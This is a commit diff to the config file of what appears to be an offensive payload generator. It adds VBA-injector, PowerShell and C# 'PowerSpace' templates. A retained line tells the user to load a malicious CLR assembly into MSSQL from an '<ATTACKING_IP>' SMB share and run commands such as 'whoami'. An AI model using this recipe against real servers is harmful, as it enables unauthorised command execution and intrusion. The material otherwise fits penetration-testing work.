Added cmd input type support

--- a/core/config/config.ini
+++ b/core/config/config.ini
@@ -4,8 +4,7 @@ clx86_compiler =
 clx64_compiler =
 masmx86_compiler =
 masmx64_compiler =
-cscx86_compiler = C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
-cscx64_compiler = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
+vba_injector = core/utils/VBAInjector/VBAInjector.exe
 clangx86_compiler =
 clangx64_compiler =
 llvmx86_compiler =
@@ -116,6 +115,11 @@ output_format = .dll
 compiler_args = -r:System.Data
 custom_output = After enabling CLR, Load the DLL in MSSQL as follows: \nCREATE ASSEMBLY my_assembly FROM '\\<ATTACKING_IP>\fileserver\evil-sc.dll' WITH PERMISSION_SET = UNSAFE; \n"CREATE PROCEDURE [dbo].[CustSQLCmd] @cmd NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[CustSQLCmd]; \nCustSQLCmd 'whoami'  \nFor more details: https://red.infiltr8.io/web-pentesting/infrastructures/dbms/exploit-databases#custom-clr-assemblies
 
+[windows_cs:PowerSpace]
+expected_format = TEXT
+output_format = .exe
+compiler_args = -r:core/templates/headers/System.Management.Automation.dll
+
 [windows_cs:MssqlRunner.dll]
 expected_format = RAW_BIN
 output_format = .dll
@@ -150,6 +154,10 @@ output_format = .ps1
 
 [windows_pwsh:reflection]
 expected_format = DOTNET_BIN,DOTNET_DLL
+output_format = .ps1
+
+[windows_pwsh:cmd]
+expected_format = TEXT
 output_format = .ps1
 
 [windows_vba:Inject]
